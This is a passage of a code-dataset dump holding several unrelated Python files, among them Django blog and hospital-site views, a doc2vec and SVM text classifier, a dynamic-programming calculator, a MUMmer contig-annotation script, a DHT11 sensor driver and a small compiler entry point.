decimal.Decimal(0)\r\n\r\n counter = 0 \r\n for pancake in pancakes:\r\n top_area = decimal.Decimal(math.pi)*pancake[0]**2\r\n side_area = 2*decimal.Decimal(math.pi)*pancake[0]*pancake[1]\r\n side_surface_areas = [2*decimal.Decimal(math.pi)*pancakes[i][0]*pancakes[i][1] for i in range(N) if pancakes[i][0]<=pancake[0] and i!=counter]\r\n side_areas_used = sum(sorted(side_surface_areas,reverse=True)[:K-1])\r\n total_area = decimal.Decimal(top_area) + decimal.Decimal(side_area) + decimal.Decimal(side_areas_used)\r\n if total_area>max_surface_area:\r\n max_surface_area = total_area\r\n \r\n \r\n return max_surface_area\r\n\r\ndef test_get_best_stack():\r\n N=2\r\n K=1\r\n pancakes = [(100,20),(200,10)]\r\n assert(abs(get_best_stack(N,K,pancakes)-decimal.Decimal(138230.076757951))/pagina/\",\n views.ArticleListView.as_view(),\n name=\"article-list\"\n ),\n path(\n \"kennis//bewerken\",\n views.ArticleEditView.as_view(),\n name=\"article-edit\"\n ),\n path(\n \"kennis//favorite\",\n views.favorite_article,\n name=\"article-favorite\"\n ),\n path(\n \"kennis//like\",\n views.like_article,\n name=\"article-like\"\n ),\n path(\n \"kennis//comment\",\n views.create_comment,\n name=\"article-comment\"\n ),\n path(\n \"kennis//\",\n views.ArticleDetailView.as_view(),\n name=\"article-detail\"\n ),\n path(\n \"nieuwekennis/pagina\",\n views.ArticleCreateView.as_view([ArticleFormPage1, ArticleFormPage2]),\n name=\"article-create-page\"\n ),\n path(\n \"nieuwekennis/\",\n views.ArticleCreateView.as_view([ArticleFormPage1, ArticleFormPage2]),\n name=\"article-create\"\n ),\n]\n","repo_name":"Ludicrux/Kennisdeler","sub_path":"apps/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2866887986","text":"\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .forms import *\nfrom .models import *\nfrom datetime import datetime\nfrom django.contrib.auth import login,authenticate,logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.files.base import ContentFile\n\n#Inicio\ndef inicio(request):\n #ordenado por contenido post\n if Post.objects.all()!=None:\n todos_post=todosPost()\n first_post=primerPost('')\n else :\n todos_post=''\n first_post='' \n \n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todos_post,'first_post':first_post,'formularioContacto':formularioContacto(),'avatar':img(request)})\n \n\n#Formularios\n@login_required\ndef formularioPosts(request):\n\n if request.method == 'POST':\n\n miFormulario = formularioPost(request.POST,request.FILES)\n \n if miFormulario.is_valid():\n \n informacion = miFormulario.cleaned_data\n \n\n post = Post(\n usuario_post=request.user,\n titulo_post = informacion['titulo_post'],\n subtitulo_post = informacion['subtitulo_post'],\n fecha_post =datetime.now() ,\n contenido_post = informacion['contenido_post'] ,\n estatus_post = True, \n )\n\n if informacion['imagen_post']!=None:\n post.imagen_post=informacion['imagen_post']\n \n\n post.save()\n\n miFormulario = formularioPost()\n\n return render(request, 'FECODER_APP/post/formularioPosts.html', {\"postCreado\":post,\"form_post\":miFormulario,'avatar':img(request)}) \n \n \n else:\n miFormulario = formularioPost()\n\n return render(request, 'FECODER_APP/post/formularioPosts.html', {\"form_post\":miFormulario,'avatar':img(request)})\n\ndef formularioContactos(request):\n \n if request.method == 'POST':\n\n miFormulario = formularioContacto(request.POST)\n print(\"error\")\n if miFormulario.is_valid():\n informacion = miFormulario.cleaned_data\n contacto = Contacto(nombre_contacto = informacion['nombre_contacto'], celular_contacto =informacion['celular_contacto'] ,correo_contacto=informacion['correo_contacto'], mensaje=informacion['mensaje'])\n contacto.save()\n\n miFormulario = formularioContacto()\n\n return render(request, 'FECODER_APP/inicio.html', {\"contactoCreado\":contacto,\"formularioContacto\":miFormulario,'todos_post':todosPost(),'first_post':primerPost(''),'avatar':img(request)}) \n \n else:\n miFormulario = formularioContacto()\n\n return render(request, 'FECODER_APP/inicio.html', {\"formularioContacto\":miFormulario,'todos_post':todosPost(),'first_post':primerPost(''),'avatar':img(request)})\n\n#Buscar\ndef buscandoPost(request):\n post=request.GET['titulo']\n todos_post=todosPost()\n primer_post=primerPost(post)\n if post!=\"\":\n obj = Post.objects.filter(estatus_post=True).filter(titulo_post__icontains=post).first()\n \n if obj: \n return render(request, 'FECODER_APP/inicio.html',{'post':obj,'titulo':post,'todos_post':todos_post,'first_post':obj,'formularioContacto':formularioContacto(),'avatar':img(request)})\n\n return render(request, 'FECODER_APP/inicio.html',{'x':\"No existe post con el nombre \"+post,'todos_post':todos_post,'first_post':primer_post,'formularioContacto':formularioContacto(),'avatar':img(request)})\n else:\n return render(request, 'FECODER_APP/inicio.html',{\"error\":\"No se ingreso un nombre de post\",'todos_post':todos_post,'first_post':primer_post,'formularioContacto':formularioContacto(),'avatar':img(request)})\n\ndef buscarPost(request):\n return render(request, 'FECODER_APP/inicio.html',{'avatar':img(request)})\n\n@login_required\ndef buscandoContacto(request):\n nombre=request.GET['nombre']\n if nombre!=\"\":\n obj = Contacto.objects.filter(nombre_contacto__icontains=nombre)\n if obj: \n return render(request, 'FECODER_APP/buscarContacto.html',{'contacto':obj,'nombre':nombre,'avatar':img(request)})\n \n return render(request, 'FECODER_APP/buscarContacto.html',{'x':\"No existe contacto con el nombre \"+nombre,'avatar':img(request)})\n else:\n return render(request, 'FECODER_APP/buscarContacto.html',{\"errorContacto\":\"No se ingreso un nombre de contacto\",'avatar':img(request)})\n \ndef buscarContacto(request):\n return render(request, 'FECODER_APP/buscarContacto.html',{'avatar':img(request)})\n\n\n#Usuarios\ndef loginUser(request):\n redirect_to = request.POST.get('next', '')\n if request.method == 'POST':\n form = LoginForm(request, request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n todos_post=todosPost()\n primer_post=primerPost('')\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todos_post,'first_post':primer_post,'formularioContacto':formularioContacto(),'avatar':img(request)})\n \n else:\n return render(request, 'FECODER_APP/usuario/login.html',{'form_login':form,'mensaje':f\"Usuario o contraseña incorrectos\"})\n \n else:\n form = LoginForm()\n return render(request, 'FECODER_APP/usuario/login.html', {'form_login': form})\n\ndef registroUser(request):\n \n if request.method == 'POST':\n form = RegisterForm(request.POST)\n if form.is_valid():\n username=form.cleaned_data['username']\n form.save()\n avatar=Avatar(user=User.objects.get(username=username))\n #USAR PARA CAMBIAR NOMBRE DE FOTO A ID DE USUARIO\n # avatar.imagen.name=username+\".png\"\n avatar.save()\n return render(request, 'FECODER_APP/usuario/login.html',{'mensaje_login':f\"Usuario registrado correctamente {username}\"})\n \n return render(request, 'FECODER_APP/usuario/registro.html',{'form_register':form,'error':form.errors})\n\n else:\n form = RegisterForm()\n return render(request, 'FECODER_APP/usuario/registro.html', {'form_register': form})\n\ndef logoutUser(request):\n todos_post=todosPost()\n primer_post=primerPost('')\n logout(request)\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todos_post,'first_post': primer_post, 'formularioContacto':formularioContacto()})\n\n@login_required\ndef editandoUsuario(request,id):\n user = User.objects.filter(id=id).first()\n if request.method == 'POST':\n form = editarUsuario(request.POST,request.FILES)\n check = request.POST.get(\"avatar-clear\", None)\n if form.is_valid():\n user.username=form.cleaned_data['username']\n user.email=form.cleaned_data['email']\n if form.cleaned_data['first_name']:\n user.first_name=form.cleaned_data['first_name']\n if form.cleaned_data['last_name']:\n user.last_name=form.cleaned_data['last_name']\n \n user.save()\n if form.cleaned_data['avatar']:\n avatar = Avatar.objects.get(user=user)\n avatar.imagen = form.cleaned_data['avatar']\n avatar.imagen.name=user.username+\".png\"\n avatar.save()\n else:\n if check:\n avatar = Avatar.objects.get(user=user)\n avatar.imagen = 'avatars/default.png'\n avatar.name=user.username+\".png\"\n avatar.save()\n \n \n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todosPost(),'first_post':primerPost(''),'formularioContacto':formularioContacto(),'avatar':img(request)})\n \n\n else:\n avatar=Avatar.objects.get(user=user.id)\n form = editarUsuario(initial={'username':user.username,'email':user.email,'avatar':avatar.imagen,'first_name':user.first_name,'last_name': user.last_name})\n return render(request, 'FECODER_APP/usuario/editarPerfil.html', {'form_editar': form,'avatar':img(request),'user':user})\n\n@login_required\ndef cambiarContraseña(request):\n user = request.user\n if request.method == 'POST':\n form = editarContraseña(request.user,request.POST)\n if form.is_valid():\n user = form.save()\n \n return render(request, 'FECODER_APP/usuario/login.html')\n \n \n\n else:\n form = editarContraseña(request.user)\n return render(request, 'FECODER_APP/usuario/cambiarContraseña.html', {'form_cambiarContraseña': form,'avatar':img(request),})\n\n@login_required\ndef mostrarPerfiles(request):\n usuarios=User.objects.all()\n return render(request, 'FECODER_APP/usuario/mostrarPerfiles.html',{'perfiles':usuarios,'avatar':img(request)})\n\n@login_required\ndef desactivarPerfil(request,id):\n usuario=User.objects.get(id=id)\n if usuario.is_active:\n usuario.is_active=False\n usuario.save()\n else :\n usuario.is_active=True\n usuario.save()\n usuarios=User.objects.all()\n return render(request, 'FECODER_APP/usuario/mostrarPerfiles.html',{'perfiles':usuarios,'avatar':img(request)})\n\n@login_required\ndef eliminarPerfil(request,id):\n usuario=User.objects.get(id=id)\n usuario.delete()\n usuarios=User.objects.all()\n return render(request, 'FECODER_APP/usuario/mostrarPerfiles.html',{'perfiles':usuarios,'avatar':img(request)})\n\n\n\ndef verPerfil(request,id):\n usuario=User.objects.get(id=id)\n avatar = Avatar.objects.filter(user = usuario)\n posts= Post.objects.filter(usuario_post=usuario).order_by('fecha_post')\n return render(request, 'FECODER_APP/usuario/verPerfil.html',{'usuario':usuario,'img':avatar[0].imagen.url,'avatar':img(request),'posts':posts})\n\n#Post\ndef verPost(request,id):\n \n post=Post.objects.get(id=id)\n avatar = Avatar.objects.filter(user = post.usuario_post) \n \n if request.method == 'POST':\n form = formularioComentario(request.POST,request.user)\n \n if form.is_valid():\n \n new_comentario = Comentario(post_comentario=post,usuario_comentario=request.user,comentario=form.cleaned_data['comentario'],fecha_comentario=datetime.now())\n new_comentario.save()\n comentario = Comentario.objects.filter(post_comentario = post)\n comentarioForm = formularioComentario()\n return render(request, 'FECODER_APP/post/mostrarPost.html',{'post':post,'img':avatar[0].imagen.url,'avatar':img(request),'comentario':comentario,'form_comentario':comentarioForm})\n \n \n else: \n comentario = Comentario.objects.filter(post_comentario = post)\n \n form = formularioComentario(initial={'post_comentario':post,'usuario_comentario':request.user,'fecha_comentario':datetime.now(),'estatus_comentario':True})\n return render(request, 'FECODER_APP/post/mostrarPost.html',{'post':post,'img':avatar[0].imagen.url,'avatar':img(request),'comentario':comentario,'form_comentario':form})\n\n@login_required\ndef borrarPost(request,id):\n post=Post.objects.get(id=id)\n post.delete()\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todosPost(),'first_post':primerPost(''),'formularioContacto':formularioContacto(),'avatar':img(request)})\n\n@login_required\ndef editarPost(request,id):\n post=Post.objects.get(id=id)\n if request.method == 'POST':\n form = edicionPost(request.POST,request.FILES)\n\n if form.is_valid():\n post.titulo_post=form.cleaned_data['titulo_post']\n post.contenido_post=form.cleaned_data['contenido_post']\n post.subtitulo_post=form.cleaned_data['subtitulo_post']\n\n if form.cleaned_data['imagen_post']:\n post.imagen_post=form.cleaned_data['imagen_post']\n else:\n post.imagen_post=post.imagen_post\n\n post.save()\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todosPost(),'first_post':primerPost(''),'formularioContacto':formularioContacto(),'avatar':img(request)})\n \n else:\n form = edicionPost(initial={'titulo_post':post.titulo_post,'contenido_post':post.contenido_post,'subtitulo_post':post.subtitulo_post,'imagen_post':post.imagen_post,'estatus_post':post.estatus_post})\n return render(request, 'FECODER_APP/post/editarPost.html',{'form_post':form,'post':post,'avatar':img(request)})\n\n@login_required\ndef desactivarPost(request,id):\n post=Post.objects.get(id=id)\n if post.estatus_post:\n post.estatus_post=False\n post.save()\n else :\n post.estatus_post=True\n post.save()\n\n \n posts= Post.objects.filter(usuario_post=request.user).order_by('fecha_post')\n avatar = Avatar.objects.filter(user = request.user)\n return render(request, 'FECODER_APP/post/misPost.html',{'posts':posts,'img':avatar[0].imagen.url,'avatar':img(request)})\n\n\ndef todosPostsUser(request):\n posts= Post.objects.filter(usuario_post=request.user).order_by('fecha_post')\n avatar = Avatar.objects.filter(user = request.user)\n return render(request, 'FECODER_APP/post/misPost.html',{'posts':posts,'img':avatar[0].imagen.url,'avatar':img(request)})\n\ndef comentarPost(request,post):\n if request.method == 'POST':\n form = formularioComentario(request.POST)\n if form.is_valid():\n comentario = form.cleaned_data['comentario']\n Comentario(post_comentario=post,usuario_comentario=request.user,comentario=comentario,fecha_comentario=datetime.now()).save()\n return \n else:\n\n form = formularioComentario()\n return render(request, 'FECODER_APP/post/comentarPost.html',{'form_comentario':form,'avatar':img(request)})\n\n\n#Contacto\n@login_required\ndef eliminarContacto(request,id):\n contacto=Contacto.objects.get(id=id)\n contacto.delete()\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todosPost(),'first_post':primerPost(''),'formularioContacto':formularioContacto(),'avatar':img(request)})\n\n\n#About\ndef about(request):\n return render(request, 'FECODER_APP/about.html',{'avatar':img(request)})\n\n\n#Extras\ndef mostrarAvatar(id):\n user = User.objects.filter(id=id).first()\n avatar = Avatar.objects.filter(user = user)\n return avatar[0].imagen.url\n\ndef img(request):\n img =''\n try:\n if not Avatar.objects.filter(user=request.user)[0].imagen.name=='default.jpg':\n avatar=Avatar.objects.filter(user=request.user)\n img=avatar[0].imagen.url\n except:\n img=''\n return img\n\ndef todosPost():\n if Post.objects.count()>0:\n return Post.objects.filter(estatus_post=True).order_by('contenido_post')\n else:\n return ''\n\ndef primerPost(tema):\n \n if Post.objects.all()!=None:\n if tema!='':\n if Post.objects.filter(estatus_post=True).filter(titulo_post__icontains=tema).first() :\n return Post.objects.filter(estatus_post=True).filter(titulo_post__icontains=tema).first()\n else:\n return Post.objects.filter(estatus_post=True).first()\n else:\n \n return Post.objects.filter(estatus_post=True).first()\n \n","repo_name":"nandocollazo03/FECODER_APP","sub_path":"FECODER_APP/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15572,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20829120759","text":"# -*- coding:utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: svm_doc2vec\n Description: svm+doc2vec 做分类\n Author: Miller\n date: 2017/9/6 0006\n-------------------------------------------------\n\"\"\"\n__author__ = 'Miller'\n\nimport gensim\nfrom sklearn.svm import SVC\nfrom classification.datasets import datasets\nfrom classification.setting import doc2vec_model\n\n\nclass svm_doc2vec(object):\n def __init__(self):\n self.model = gensim.models.Doc2Vec.load(doc2vec_model)\n\n def train_doc2vec_model(self, data_path, model_path):\n sentences = gensim.models.doc2vec.TaggedLineDocument(data_path)\n model = gensim.models.Doc2Vec(sentences, size=200, window=5, min_count=5)\n model.save(model_path)\n print('num of docs: %d' + len(model.docvecs))\n\n def load_datasets(self):\n x_train = []\n x_test = []\n for idx, docvec in enumerate(self.model.docvecs):\n if idx < 17600:\n x_train.append(docvec)\n else:\n x_test.append(docvec)\n return x_train, x_test\n\nif __name__ == '__main__':\n train_labels = datasets.load_train_labels()\n test_labels = datasets.load_test_labels()\n svm_doc2vec = svm_doc2vec()\n x_train, x_test = svm_doc2vec.load_datasets()\n y_train = train_labels\n y_test = test_labels\n\n print('train doc shape: ' + str(len(x_train)) + ' , ' + str(len(x_train[0])))\n print('test doc shape: ' + str(len(x_test)) + ' , ' + str(len(x_test[0])))\n\n print('SVM...')\n\n svc = SVC(kernel='rbf')\n svc.fit(x_train, y_train)\n predictions = svc.predict(x_test)\n num = 0\n predictions = predictions.tolist()\n for i, pred in enumerate(predictions):\n if int(pred) == int(y_test[i]):\n num += 1\n print('precision_score:' + str(float(num) / len(predictions)))\n\n","repo_name":"guoguolan1991/learn_tensorflow","sub_path":"classification/svm_doc2vec.py","file_name":"svm_doc2vec.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12976257689","text":"from django.shortcuts import render, redirect\n\nfrom .models import Organization\nfrom .forms import OrganizationForm\n\n# Create your views here.\ndef organization(request):\n organization = Organization.objects.using(\"organization_db\").all() # manually selecting database\n \n if request.method == \"POST\":\n form = OrganizationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"/organization\")\n else:\n form = OrganizationForm()\n\n context = {\n 'organization': organization,\n 'form': form,\n }\n return render(request, \"organization/organization.html\", context)","repo_name":"surajkarki66/django-multiple-dbs-and-analytics","sub_path":"organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1639486712","text":"\"\"\"\nPrimitive Calculator\n\nProblem Description\nTask. Given an integer n, compute the minimum number of operations needed to obtain the number n\nstarting from the number 1.\nInput Format. The input consists of a single integer 1 ≤ n ≤ 10 6 .\nOutput Format. In the first line, output the minimum number k of operations needed to get n from 1.\nIn the second line output a sequence of intermediate numbers. That is, the second line should contain\npositive integers a 0 , a 2 , . . . , a k−1 such that a 0 = 1, a k−1 = n and for all 0 ≤ i < k − 1, a i+1 is equal to\neither a i + 1, 2a i , or 3a i . If there are many such sequences, output any one of them.\n\nSample 1.\nInput:\n1\nOutput:\n0\n1\n\nSample 2.\nInput:\n5\nOutput:\n3\n1245\nHere, we first multiply 1 by 2 two times and then add 1. Another possibility is to first multiply by 3\nand then add 1 two times. Hence “1 3 4 5” is also a valid output in this case.\n\nSample 3.\nInput:\n96234\nOutput:\n14\n1 3 9 10 11 22 66 198 594 1782 5346 16038 16039 32078 96234\nAgain, another valid output in this case is “1 3 9 10 11 33 99 297 891 2673 8019 16038 16039 48117\n96234”.\n\"\"\"\n\n# Uses python3\nimport sys\n\ndef optimal_sequence(n):\n if n == 1:\n return [1]\n ops = min_ops(n)\n return construct_min_list(n, ops)\n\ndef construct_min_list(n, ops):\n result = []\n while(n>=1):\n result.append(n)\n if n%3 != 0 and n%2 != 0:\n n -= 1\n\n elif n%3 == 0 and n%2 == 0:\n n = int(n/3)\n\n elif n%3 == 0:\n if ops[n-1] < ops[n//3]:\n n = n-1\n else:\n n = n // 3\n\n elif n%2 == 0:\n if ops[n-1] < ops[n//2]:\n n = n-1\n else:\n n = n // 2\n\n return reversed(result)\n\ndef min_ops(n):\n result = [0 for i in range(n+1)]\n for i in range(2,n+1):\n min_1 = result[i-1]\n min_2 = sys.maxsize\n min_3 = sys.maxsize\n\n if i%2 == 0:\n min_2 = result[int(i//2)]\n\n if i%3 == 0:\n min_3 = result[int(i//3)]\n\n minOperations = min(min_1,min_2,min_3)+1\n result[i] = minOperations\n\n return result\n\ninput = sys.stdin.read()\nn = int(input)\nsequence = list(optimal_sequence(n))\nprint(len(sequence) - 1)\nfor x in sequence:\n print(x, end=' ')\n","repo_name":"amogchandrashekar/Data-Structures-and-Algorithms-Specialization","sub_path":"Algorithmic Toolbox/week5_dynamic_programming_1/primitive_calculator.py","file_name":"primitive_calculator.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"71227252996","text":"from sqlalchemy import insert, select\n\nfrom app.database import async_session_maker\nfrom app.services.room_availability import RoomsAvailability\n\n\nclass BaseDAO:\n model = None\n\n get_rooms_left = RoomsAvailability.get_rooms_left\n\n @classmethod\n async def find_by_id(cls, model_id: int):\n async with async_session_maker() as session:\n query = select(cls.model).filter_by(id=model_id)\n result = await session.execute(query)\n return result.scalar_one_or_none()\n\n @classmethod\n async def find_one_or_none(cls, **filter_by):\n async with async_session_maker() as session:\n query = select(cls.model).filter_by(**filter_by)\n result = await session.execute(query)\n return result.scalar_one_or_none()\n\n @classmethod\n async def find_all(cls, **filter_by):\n async with async_session_maker() as session:\n query = select(cls.model).filter_by(**filter_by)\n result = await session.execute(query)\n return result.mappings().all()\n\n @classmethod\n async def add(cls, **data):\n async with async_session_maker() as session:\n query = insert(cls.model).values(**data)\n await session.execute(query)\n await session.commit()\n\n @classmethod\n async def del_by_id(cls, id: int):\n async with async_session_maker() as session:\n to_delete = await session.get(cls.model, id)\n\n if to_delete:\n await session.delete(to_delete)\n await session.commit()\n return True\n else:\n return False\n","repo_name":"Sharpylo/booking_hotels","sub_path":"app/dao/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21018200854","text":"#mummer_clusters.py - Nick Loman\n# python mummer_clusters.py Contigs_15k.fasta clustering_gt1000.csv all_input_table.tsv cov_mean_sample_1122-H-Cdiff.sorted.bam cov_mean_sample_5066-H-STEC.sorted.bam > newannotations.txt\n\nimport os\nimport sys\nimport csv\nfrom Bio import SeqIO\nfrom collections import defaultdict\n\ntag = sys.argv[1]\nclusteringfn = sys.argv[2]\ncoveragefn = sys.argv[3]\n\n##read clustering \ncontigmap = {}\nfor ln in open(clusteringfn, \"r\"):\n\tcontig, cluster_number = ln.rstrip().split(\",\")\n\tcontigmap[contig] = cluster_number\t\n\n##coverage information\ncovmap = {}\nwith open(coveragefn, 'r') as csvfile:\n\treader = csv.DictReader(csvfile, dialect='excel-tab')\n\tcol1 = reader.fieldnames.index(sys.argv[4])\n\tcol2 = reader.fieldnames.index(sys.argv[5])\n\nwith open(coveragefn, 'r') as csvfile:\n\treader = csv.reader(csvfile, dialect='excel-tab')\n\tnext(reader)\n\tfor row in reader:\n\t\tvals = [row[0], row[1], row[2], str(sum([float(x) for x in row[col1:col2+1]]))]\n\t\tcovmap[row[0]] = vals\n\nrefs = { 'NC_018658' : 'OutbreakGenome',\n 'NC_018659' : 'plasmid_pESBL',\n 'NC_018666' : 'plasmid_pAA',\n 'NC_000913' : 'Ecoli_CoreGenome', }\n\ncontig_set = defaultdict(dict)\n\nfor chrom, label in refs.items():\n\tif not os.path.exists(\"%s_%s.delta\" % (tag, chrom)):\n\t\tos.system(\"nucmer --prefix=%s_%s %s.fna %s\" % (tag, chrom, chrom, tag))\n\t#os.system(\"show-tiling %s_%s.delta > %s_%s.tiling\" % (tag, chrom, tag, chrom))\n\tos.system(\"delta-filter -i 98 %s_%s.delta > %s_%s.mummer\" % (tag, chrom, tag, chrom))\n\tfh = open(\"%s_%s.mummer\" % (tag, chrom,))\n\twhile True:\n\t\tln = fh.readline()\n\t\tif not ln: break\n\n\t\tif ln.startswith('>'):\n\t\t\tcontig = ln.rstrip().split()[1]\n\t\t\t#contig_set[label].add(contig)\n\t\t\tcoords = fh.readline()\n\t\t\tcols = coords.split(\" \")\n\t\t\tstart = cols[0]\n\t\t\tcontig_set[label][contig] = start\n\nprint(\"Contig\", end=' ')\nfor label in sorted(contig_set.keys()):\n\tprint(\"\\t\" + label, end=' ')\nprint()\n\nfor rec in SeqIO.parse(tag, \"fasta\"):\n\tprint(\"%s\\t%s\\t%s\" % (rec.id, contigmap[rec.id], \"\\t\".join(covmap[rec.id])), end=' ')\n\tfor label in sorted(contig_set.keys()):\n\t\tif rec.id in list(contig_set[label].keys()):\n\t\t\tprint(\"\\tY\\t%s\" % (contig_set[label][rec.id]), end=' ')\n\t\telse:\n\t\t\tprint(\"\\tN\\tNA\", end=' ')\n\tprint()\n","repo_name":"jtamames/SqueezeMeta","sub_path":"bin/CONCOCT-1.1.0/scripts/mummer_clusters.py","file_name":"mummer_clusters.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"61"} +{"seq_id":"13300822193","text":"\"\"\"\nInitial amino acid transition probabilities:\nNxN matrix\n\"\"\"\n\nimport initial_amino_sequence \n\ndef create_dictionary(sequence):\n keys = []\n for i in sequence:\n if i not in keys:\n keys.append(i)\n print(keys)\n diction = {}\n for key in sorted(keys): #for every key in the list of amino acids\n if key not in diction: #if key isn't already present in dictionary\n diction[key] = {} #then create a key in dictionary\n for j in sorted(keys): #then iterate over the list of keys and\n diction[key][j]=0 #set {key: {k1:0, k2:0,...kN:0}}, where kN is the Nth key in keys\n return diction\n\ndef fill_dictionary(diction,amino):\n for i in range(0,len(amino)-1):\n diction[amino[i]][amino[i+1]] += 1\n return diction \n \ndef compute_probabilities(fill,amino):\n for i in fill:\n count=0\n for j in fill[i]:\n count += fill[i][j] #count the number of transitions per amino acid\n for j in fill[i]: \n fill[i][j] /= count #compute the probability\n return fill\n \n\namino = initial_amino_sequence.compile_amino_sequence() #list of tokens\n\ndiction = create_dictionary(amino) #empty dictionary\nfill = fill_dictionary(diction,amino) #filled dictionary\ntransitions = compute_probabilities(fill,amino) #dictionary of probabilities\nprint(transitions)\n","repo_name":"likitha-9/Gene-Prediction-Using-HMM-Stochastic","sub_path":"amino_transitions.py","file_name":"amino_transitions.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14780752727","text":"import time\n\nimport Adafruit_DHT\n\nfrom environs import Env\n\nfrom .sensor import Sensor\n\n# Load enviroment variables\nenv = Env()\nenv.read_env()\n\n\nclass DHT11Exception(Exception):\n \"\"\"\n Unable to get a reading from DHT11.\n \"\"\"\n\n pass\n\n\nclass DHT11(Sensor):\n \"\"\"\n Class to connect to the DHT11 sensor.\n \"\"\"\n\n def __init__(self):\n self._sensor = Adafruit_DHT.DHT11\n\n self._pin = env.int(\"DHT11_PIN\", default=None)\n\n if self._pin is None:\n raise ValueError(\"DHT pin value must be informed.\")\n\n def calibrate(self):\n \"\"\"\n During the DHT11 booting time (when the circuit turns on), the datasheet\n informs to wait 1 second before the sensor is able to respond to any commands.\n \"\"\"\n print(\"Calibrating DHT11 sensor...\")\n\n time.sleep(1)\n\n print(\"Calibrating DHT11 sensor...done!\")\n\n def get_humidity(self):\n \"\"\"\n Returns a float percentage value representing the the humidity measured by the DHT11 sensor.\n According to the datasheet the time interval between taking consecutive readings\n must be of at least of 2 seconds.\n\n In most cases you'll always get back a temperature or humidity value when requested,\n but sometimes if there's electrical noise or the signal was interrupted in some way.\n Use the read_retry method which will retry up to 15 times to get a sensor reading\n (waiting 2 seconds between each retry).\n Note that sometimes you won't get a reading and\n the results will be null (because Linux can't\n guarantee the timing of calls to read the sensor).\n If this happens, the method returns None (and it is necessary to try again!).\n \"\"\"\n\n # (Can take up to 30 seconds)\n humidity, _temperature = Adafruit_DHT.read_retry(self._sensor, self._pin)\n\n if humidity is not None:\n return round(humidity, 3)\n else:\n raise DHT11Exception(\"Reading from DHT failed. Try again!\")\n","repo_name":"dzvid/aqs-sensor-node","sub_path":"src/sensor_node/sensing_module/sensors/dht11.py","file_name":"dht11.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"9588256353","text":"\"\"\" Схема URL для приложения О больнице\"\"\"\n\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n # Базовая страница с информацией о больнице\n url(r'^$', views.about, name='about'),\n url(r'^reference_hospital/$', views.reference_hospital, name='reference_hospital'),\n url(r'^maternity_hospital/$', views.maternity_hospital, name='maternity_hospital'),\n url(r'^women/$', views.women, name='women'),\n url(r'^schedule/$', views.schedule, name='schedule'),\n url(r'^reference_kdc/$', views.reference_kdc, name='reference_kdc'),\n url(r'^reference_pay/$', views.reference_pay, name='reference_pay'),\n url(r'^reception/$', views.reception, name='reception'),\n url(r'^rules/patients-rules/$', views.patients_rules, name='patients_rules'),\n url(r'^rules/ban/$', views.ban, name='ban'),\n url(r'^rules/product-allow/$', views.product_allow, name='product_allow'),\n url(r'^rules/product-disallow/$', views.product_disallow, name='product_disallow'),\n url(r'^rules/$', views.rules, name='rules'),\n]\n","repo_name":"nvo87/MedKiosk","sub_path":"about/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38305822111","text":"from .lexer import Lexer\nfrom .parsers import parse\nfrom .errorHandler import ErrorHandler\nfrom .analyzer import Analyzer\nfrom .codegen import codegen\n\n\n# Maybe we should change the implementation of Lexer and tokenParser\n# to a pure implementation\ndef compile(path):\n with open(path) as file:\n x = file.read()\n\n errorHandler = ErrorHandler()\n lexer = Lexer(x, errorHandler)\n tokens = lexer.tokenize()\n\n # if there is any errors, print them\n if errorHandler:\n print(errorHandler)\n\n #print(\"\\n\".join(str(x) for x in tokens))\n\n result = parse(tokens, errorHandler)\n\n if errorHandler:\n print(errorHandler)\n\n #print(result)\n\n analysis = Analyzer(result)\n analysis.analyze()\n sym_table = analysis.symbol_table\n\n gen_filename = path.split(\"/\")[-1].split(\".\")[-2] + \".S\"\n codegen(result, gen_filename, sym_table)\n","repo_name":"devchannel/DevLang","sub_path":"DevLang/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"21039764023","text":"from scipy.io import loadmat\nimport numpy as np\n\ndef indices_to_one_hot(data, nb_classes=10):\n \"\"\"Convert an iterable of indices to one-hot encoded labels.\"\"\"\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]\n\ndef load_svhn_data(hot=True):\n \"\"\" Helper function for loading a MAT-File\"\"\"\n train_data = 